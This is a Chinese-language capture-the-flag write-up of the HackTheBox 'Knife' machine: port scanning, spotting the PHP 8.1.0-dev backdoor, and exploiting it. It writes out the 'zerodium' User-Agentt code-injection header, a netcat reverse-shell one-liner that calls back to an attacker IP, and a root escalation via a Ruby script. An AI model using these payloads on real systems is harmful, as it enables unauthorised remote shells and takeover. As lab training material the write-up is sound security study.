HTB-Hackthebox - Knife

由 admin 发布

信息搜集

靶机IP

image-20210523140456146

端口扫描

nmap -sV -sC 10.10.10.242

Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title:  Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

开放两个端口,由于该靶机定位为CVE,所以搜索了 8.2p1以及Apache 2.4.41 都没有结果,扫描目录也是同样的

Nikto

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.242
+ Target Hostname:    10.10.10.242
+ Target Port:        80
+ Start Time:         2021-05-23 13:54:34 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ Retrieved x-powered-by header: PHP/8.1.0-dev

得到 php 版本为 php/8.1.0-dev

image-20210523140426256

https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md

漏洞利用 php 8.1.0-dev

验证

在请求头中加入 User-Agentt: zerodiumvar_dump(233*233);

返回内容中代码以及成功执行

image-20210523135631673

获取shell

监听端口

更改请求头

User-Agentt: zerodiumsystem('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.7 2233 >/tmp/f');

得到shell

image-20210523140030201

ROOT

写入 system('/bin/bash') 到 root.rb

执行就可以得到root

image-20210523140107506


暂无评论

发表评论